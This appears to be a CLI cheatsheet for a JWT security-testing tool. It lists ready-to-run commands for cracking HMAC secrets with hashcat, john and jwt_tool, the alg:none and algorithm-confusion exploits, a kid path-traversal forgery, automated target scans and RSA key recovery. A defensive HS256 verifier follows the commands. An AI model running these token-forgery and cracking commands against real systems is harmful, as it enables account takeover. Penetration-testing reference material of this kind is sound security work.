CLI Cheatsheet

Ready-to-use commands for operations too compute-heavy for the browser.

Browser vs CLI
JWT Arsenal handles all crypto in-browser. For GPU brute-force of weak HMAC secrets and RSA key recovery (GCD over 4096-bit numbers), you need the dedicated CLI tools listed here.
| Vulnerability | Tool | Command | Notes |
|---|---|---|---|
| Weak HMAC Secret | hashcat | hashcat -m 16500 jwt.txt /path/to/rockyou.txt | Mode 16500 = JWT. Add -r rules/best64.rule for rule-based attack. |
| Weak HMAC Secret | hashcat | hashcat -m 16500 jwt.txt -a 3 ?a?a?a?a?a?a | Brute-force mode. Use ?a for all ASCII printable chars. |
| Weak HMAC Secret | john | john --format=HMAC-SHA256 jwt.txt --wordlist=/path/to/rockyou.txt | John the Ripper - format varies by JWT algorithm. |
| Weak HMAC Secret | jwt_tool | python3 jwt_tool.py <JWT> -C -d /path/to/wordlist.txt | -C = crack mode, -d = dictionary file. |
| Public Key Recovery | rsa_sign2n | python3 jwt_forgery.py "<JWT1>" "<JWT2>" | Requires 2 RS256 tokens from same key. Outputs candidate public keys. |
| Algorithm None | jwt_tool | python3 jwt_tool.py <JWT> -X a | -X a = alg:none exploit. Tests all casing variants. |
| Algorithm Confusion | jwt_tool | python3 jwt_tool.py <JWT> -X k -pk public.pem | Uses public.pem as HMAC secret for HS256 signing. |
| KID Path Traversal | jwt_tool | python3 jwt_tool.py <JWT> -I -hc kid -hv "../../../../../../dev/null" -S hs256 -p "" | -I = inject header claim, -hc = claim name, -hv = value. |
| Generic Tampering | jwt_tool | python3 jwt_tool.py <JWT> -T | -T = tampering mode (interactive). Good for manual claim modification. |
| Scan for vulnerabilities | jwt_tool | python3 jwt_tool.py <JWT> -t https://target.com/api -rh 'Authorization: Bearer JWT' -M pb | -M pb = playbook scan. Tests common JWT attack vectors automatically. |
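
A defender-side counterpart to the Algorithm None, KID Path Traversal and Weak HMAC Secret rows above, added here as an example and not part of JWT Arsenal or jwt_tool: a standard-library HS256 verifier that pins the algorithm, treats kid as an exact lookup key and refuses short secrets. The key store, the kid name and the secret are constructed sample values.

```python
import base64
import hashlib
import hmac
import json

# Constructed sample key store: kid is looked up as an exact dictionary key.
KEYS = {"2024-primary": b"constructed-sample-secret-0123456789abcdef"}
ALLOWED_ALG = "HS256"  # pinned by the verifier, never read from the token
MIN_SECRET_LEN = 32    # bytes; RFC 7518 requires >= 256-bit keys for HS256


def b64url_decode(part: str) -> bytes:
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def sign(claims: dict, kid, key: bytes, alg: str = "HS256") -> str:
    """Helper for building constructed test tokens (always HMAC-SHA256)."""
    head = b64url_encode(json.dumps({"alg": alg, "kid": kid}).encode())
    body = b64url_encode(json.dumps(claims).encode())
    sig = hmac.new(key, f"{head}.{body}".encode(), hashlib.sha256).digest()
    return f"{head}.{body}.{b64url_encode(sig)}"


def verify(token: str) -> dict:
    """Return the claims of a valid token; raise ValueError otherwise."""
    parts = token.split(".")
    if len(parts) != 3 or not parts[2]:
        raise ValueError("malformed token or empty signature")
    header = json.loads(b64url_decode(parts[0]))
    if not isinstance(header, dict):
        raise ValueError("header is not a JSON object")
    # Exact comparison rejects none, None, NONE, nOnE and every other alg.
    if header.get("alg") != ALLOWED_ALG:
        raise ValueError("unexpected alg")
    # kid never reaches the filesystem or a query, so traversal strings
    # such as ../../dev/null are simply unknown keys.
    kid = header.get("kid")
    key = KEYS.get(kid) if isinstance(kid, str) else None
    if key is None:
        raise ValueError("unknown kid")
    if len(key) < MIN_SECRET_LEN:
        raise ValueError("configured secret is too short")
    expected = hmac.new(key, f"{parts[0]}.{parts[1]}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(parts[2])):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(parts[1]))
```

Every rejection path raises ValueError, so a caller can map all of them to a single 401 response without revealing which check failed.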

Tool Setup

jwt_tool

    git clone https://github.com/ticarpi/jwt_tool
    cd jwt_tool
    pip3 install -r requirements.txt
    python3 jwt_tool.py --help

rsa_sign2n

    git clone https://github.com/silentsignal/rsa_sign2n
    cd rsa_sign2n
    pip3 install -r requirements.txt
    python3 standalone/jwt_forgery.py --help

Wordlists

rockyou.txt - Classic 14M password list
scraped-JWT-secrets.txt (SecLists) - JWT-specific secrets list

Tool Reference

jwt_tool - Python toolkit for JWT testing, tampering, and exploitation (GitHub)
rsa_sign2n - RSA public key recovery from JWT signatures (GitHub)
hashcat - GPU-accelerated password recovery (mode 16500 for JWT) (hashcat.net)
john - John the Ripper, classic CPU-based cracker (openwall.com)